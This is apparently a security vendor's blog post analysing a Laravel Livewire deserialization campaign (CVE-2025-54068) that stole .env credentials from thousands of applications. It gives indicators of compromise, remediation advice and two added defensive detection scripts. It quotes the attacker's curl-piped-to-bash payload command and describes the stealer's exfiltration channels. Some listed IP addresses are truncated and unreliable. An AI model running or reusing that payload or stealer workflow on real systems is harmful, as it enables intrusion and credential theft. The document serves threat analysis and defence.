IMPERVABLOG 9.8 CRITICAL

CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised_IMPERVABLOG:CC22F53AF67610E01435FC711BB2B03F

9.8 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

## **Introduction**

On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).

The campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker's exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker's FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.

## **Attack Vectors and TTPs**

### **Initial Access: CVE-2025-54068 Exploitation**

CVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework's hydration process. When a Livewire component's state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.

The following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:

For full technical details on this vulnerability, please see the disclosure here.

### **Payload Analysis**

The exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker's payload executes the following command:


**curl -skfsSL hxxps://xantibot[.]pw/database-sell/shoc.enz | tr -d '\r' | bash >/dev/null 2>&1 &**

This fetches a shell script from the attacker's C2 server and pipes it directly into bash, executing it in the background with all output suppressed.

## **Malware Analysis**

The credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (**SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e**). At the time of our analysis, this sample was not present in VirusTotal.

### **Execution Flow**

The malware follows an eight-stage execution process:

1. **Environment Setup**: Creates a temporary working directory at /tmp/xxxxx
2. **Process Check**: Verifies no existing shoc.sh processes are running to prevent multiple instances
3. **File Discovery**: Recursively scans the entire filesystem for .env files using the find command
4. **Credential Extraction**: Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values
5. **Data Collection**: Copies matching files to a staging directory with randomized filenames
6. **Compression**: Archives collected files using zip or tar.gz
7. **Exfiltration**: Uploads archives to three separate C2 channels
8. **Cleanup**: Deletes the local staging directory to remove forensic evidence

### **Exfiltration Infrastructure**

The threat actor operates a redundant three-channel exfiltration system:

**Channel** | **Endpoint** | **Purpose**
---|---|---
Primary | FTP @ 47.129.100.149:21 | Main credential storage
Secondary | api.telegram.org | Notifications and small file uploads
Tertiary | upload.gofile.io | Backup cloud storage

Our investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.

### **Attribution Indicators**

Multiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia/Jakarta, and the Telegram handle @ashtarotz ("黐線佬 Wong Gen Deng") linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. Analysis of the domain and of the Telegram channel metadata also points to an Indonesian origin.

The GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.

## **What Was Stolen: Analysis of the Recovered Data**

Laravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application's database, impersonate users, process payments, and access cloud infrastructure.

Analysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.

The breakdown of exposed credentials:

**Credential Type** | **Count**
---|---
Database passwords (real, non-default) | 14,566 (66.5%)
Production applications with DB credentials | 5,784
Confirmed live Stripe secret keys (sk_live_) | 188
Valid AWS IAM credentials (AKIA format) | 381
JWT secrets | 2,929
Google OAuth client secrets (GOCSPX-) | 2,409
Filament admin panel passwords | 2,232
SMTP passwords | 7,176 (32.7%)

The FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.
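To turn the breakdown above into a post-compromise rotation checklist, the following added example (not Imperva's tooling) classifies the secrets in a Laravel .env file by the credential classes the blog counted. The key prefixes (sk_live_, AKIA, GOCSPX-) and variable names are taken from the table; the list of "default" database passwords and the sample .env contents are constructed assumptions, and secret values are never returned, only the variable names to rotate.

```python
import re
# Constructed sample .env in Laravel's KEY=value format; every value is fake.
SAMPLE_ENV = """\
APP_ENV=local
APP_KEY=base64:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
DB_PASSWORD="Xk9!examplePass"
MAIL_PASSWORD=mailpass-example
STRIPE_SECRET=sk_live_EXAMPLE0000000000
AWS_ACCESS_KEY_ID=AKIAEXAMPLE000000000
GOOGLE_CLIENT_SECRET=GOCSPX-example000
JWT_SECRET=example-jwt-secret
"""
# Values treated as "default" DB passwords; the blog's exact list is not given (assumption).
DEFAULT_DB_PASSWORDS = {"", "secret", "password", "root", "null"}
# One matcher per credential class in the blog's breakdown; prefixes come from its table.
CLASSES = [
    ("Database password (non-default)",
     lambda k, v: k == "DB_PASSWORD" and v.lower() not in DEFAULT_DB_PASSWORDS),
    ("Live Stripe secret key", lambda k, v: v.startswith("sk_live_")),
    ("AWS IAM access key", lambda k, v: re.fullmatch(r"AKIA[0-9A-Z]{16}", v) is not None),
    ("JWT secret", lambda k, v: k == "JWT_SECRET" and v != ""),
    ("Google OAuth client secret", lambda k, v: v.startswith("GOCSPX-")),
    ("SMTP password", lambda k, v: k == "MAIL_PASSWORD" and v != ""),
    ("Laravel APP_KEY", lambda k, v: k == "APP_KEY" and v != ""),
]

def parse_env(text):
    """Parse KEY=value lines, dropping comments and surrounding quotes (simplified loader)."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env

def rotation_checklist(text):
    """Map credential class -> variable names to rotate; secret values are never returned."""
    # APP_ENV is deliberately ignored: the blog found live keys in files labelled "local".
    found = {}
    for key, value in parse_env(text).items():
        for label, match in CLASSES:
            if match(key, value):
                found.setdefault(label, []).append(key)
    return found
```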

## **Targeting**

The campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.

## **Conclusion and Recommendations**

This campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.

We recommend the following actions for defenders:

1. **Patch immediately**: Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.
2. **Block outbound FTP**: Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.
3. **Monitor for suspicious API access**: Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.
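The detection logic behind recommendations 2 and 3, together with the stager command and exfiltration channels described in the malware analysis, as an added example that is not Imperva's code: it runs over constructed host-agent events (one JSON object per line; the event schema, the process names and the non-C2 addresses are assumptions) and flags outbound FTP, the known C2 IP and domains from the IoC section, egress to the two upload services, and a download tool piped into a shell.

```python
import json
import re
# Indicators from the blog's IoC section (written undefanged so they match log text).
C2_IPS = {"47.129.100.149"}
C2_DOMAINS = {"xantibot.pw", "webhook.site"}
# Upload services the blog recommends alerting on when a web server contacts them.
ATYPICAL_EGRESS_HOSTS = {"api.telegram.org", "upload.gofile.io"}
# A download tool whose output is piped into a shell, as in the campaign's stager command.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|.*\b(ba)?sh\b")

# Constructed sample events, one JSON object per line, as a host agent might emit them.
# Addresses other than the C2 IP are from documentation ranges; none of this is real telemetry.
SAMPLE_EVENTS = """\
{"type":"process","comm":"php-fpm","cmdline":"sh -c curl -skfsSL https://xantibot.pw/database-sell/shoc.enz | bash"}
{"type":"connect","comm":"bash","dst_ip":"47.129.100.149","dst_port":21,"dst_host":""}
{"type":"connect","comm":"curl","dst_ip":"203.0.113.10","dst_port":443,"dst_host":"api.telegram.org"}
{"type":"connect","comm":"php-fpm","dst_ip":"198.51.100.5","dst_port":3306,"dst_host":"db.internal"}
{"type":"process","comm":"php-fpm","cmdline":"php artisan queue:work"}
"""

def flag_event(event):
    """Return the detection reasons for one event (empty list if nothing matched)."""
    reasons = []
    if event.get("type") == "process":
        cmd = event.get("cmdline", "")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("remote script piped into shell")
        if any(domain in cmd for domain in C2_DOMAINS):
            reasons.append("known C2 domain in command line")
    elif event.get("type") == "connect":
        if event.get("dst_port") == 21:
            reasons.append("outbound FTP from web server")
        if event.get("dst_ip") in C2_IPS:
            reasons.append("connection to known C2 IP")
        if (event.get("dst_host") or "").lower() in ATYPICAL_EGRESS_HOSTS:
            reasons.append("egress to atypical upload service")
    return reasons

def scan_events(text):
    """Map 1-based line numbers of flagged events to their reasons."""
    findings = {}
    for number, line in enumerate(text.splitlines(), 1):
        if line.strip():
            reasons = flag_event(json.loads(line))
            if reasons:
                findings[number] = reasons
    return findings
```

The command-line rule is intentionally broad (any curl/wget piped into sh or bash) because the page's stager is only one instance of that pattern; tune it against your own build and deployment tooling before alerting on it.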

If you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.

## **Indicators of Compromise**

### **IP Addresses**

* 86.88.234 (Attack source)
* 47.129.100.149 (FTP C2 server)
* 63.67.153 (Webhook server)

### **Domains and URLs**

* xantibot[.]pw
* hxxps://xantibot[.]pw/database-sell/shoc.enz
* hxxps://webhook[.]site/b156c0b1-3e2f-41b4-a9a3-f492e50a0595

### **File Hashes (SHA-256)**

* 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)

### **MITRE ATT&CK Mapping**

**Technique ID** | **Technique Name** | **Campaign Usage**
---|---|---
T1190 | Exploit Public-Facing Application | CVE-2025-54068 exploitation
T1059.004 | Unix Shell | Bash script execution via piped curl
T1105 | Ingress Tool Transfer | curl retrieval of shoc.enz payload
T1083 | File and Directory Discovery | Recursive filesystem scan for .env files
T1552.001 | Credentials In Files | .env file harvesting
T1560.001 | Archive Collected Data: Archive via Utility | zip/tar.gz staging archive creation
T1041 | Exfiltration Over C2 Channel | Telegram Bot API exfiltration
T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | FTP exfiltration to 47.129.100.149
T1567.002 | Exfiltration to Cloud Storage | GoFile uploads
T1070.004 | File Deletion | Staging directory cleanup post-exfiltration
T1036 | Masquerading | Randomized archive and staging folder names

_Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support._


Basic Information

ID IMPERVABLOG:CC22F53AF67610E01435FC711BB2B03F
Published Jun 23, 2026 at 18:01
